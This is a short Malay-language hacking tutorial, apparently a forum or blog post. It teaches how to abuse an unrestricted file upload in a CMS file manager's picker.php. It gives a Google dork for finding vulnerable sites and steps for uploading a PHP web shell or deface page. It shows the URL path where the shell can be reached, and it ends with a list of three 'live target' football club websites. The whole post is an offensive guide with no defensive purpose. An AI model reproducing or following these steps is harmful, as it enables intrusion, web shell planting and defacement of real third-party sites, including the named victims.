Assalamualaikum dan salam sejahtera....hari ini aku nak ajar exploit lagi.exploit ni agak lama jugak.ok aku pun malas nak bercakap banyak.
Jom mula!
1.Cari web guna dork :
inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
2. Pilih salah satu website dan buka.
note : tak perlu tambah exploit url di belakang url.bila buka web tu terus keluar.
3. Selepas itu tengok di sudut bawah sebelah kanan.Tengok akan ada kotak macam dalam gambar :
Click Choose File ,pilih shell/deface korang, dan click Go.
note : korang tak perlu menukar extension shell korang,korang boleh terus upload shell ber-extension php.
Contoh : Shell.php
4. Baiklah untuk melihat hasil :
http://www.target.com/files/Shell.php
atau
http://www.target.com/path/files/Shell.php
5. Done!
Live Targets :
http://www.admiralfc.co.uk/modules/filemanagermodule/actions/picker.php?id=0
http://www.dogandduckfc.com/newsite/modules/filemanagermodule/actions/picker.php?id=0
http://www.bantamorloff.co.uk/modules/filemanagermodule/actions/picker.php?id=0
Baiklah itu saja..Assalamualaikum~~
